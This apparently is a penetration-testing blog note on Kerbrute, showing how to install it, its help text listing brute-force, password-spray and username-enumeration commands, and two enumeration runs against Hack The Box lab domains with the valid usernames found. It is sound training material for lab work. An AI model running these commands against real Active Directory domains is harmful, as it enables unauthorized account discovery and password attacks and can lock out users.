🖊️ Author: Nairuz Abulhul
🌐 Blog: R3dbuck3t
Tools and Techniques
To install Kerbrute, we need to download the binary from kerbrute releases, select the latest one for Linux kerbrute_linux_amd64, and change its privileges to be executable.
@htb[/htb]$ mv ~/Downloads/kerbrute_linux_amd64 kerbrute
$ chmod +x ./kerbrute
$ ./kerbrute
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/
Version: v1.0.3 (9dad6e1) - 04/06/23 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
<aside> 💡 When you fail in finding username from other ports, attempt kerbrute with teh list of username to identify valid users
</aside>
./kerbrute userenum --domain htb.local --dc 10.10.10.52 ~/Downloads/wordlists/xato-net-10-million-usernames.txt
2023/05/23 13:45:54 > [+] VALID USERNAME: [email protected]
2023/05/23 13:45:55 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:00 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:05 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:17 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:41 > [+] VALID USERNAME: [email protected]
2023/05/23 13:47:03 > [+] VALID USERNAME: [email protected]
htb[/htb]$ kerbrute userenum users.txt --dc dc01.inlanefreight.local -d inlanefreight.local
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/
Version: v1.0.3 (9dad6e1) - 08/25/20 - Ronnie Flathers @ropnop
2020/08/25 23:14:51 > Using KDC(s):
2020/08/25 23:14:51 > dc01.inlanefreight.local:88
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > Done! Tested 117 usernames (8 valid) in 0.347 seconds
Use Kerbrute in conjunction with the jsmith.txt or jsmith2.txt user lists from Insidetrust.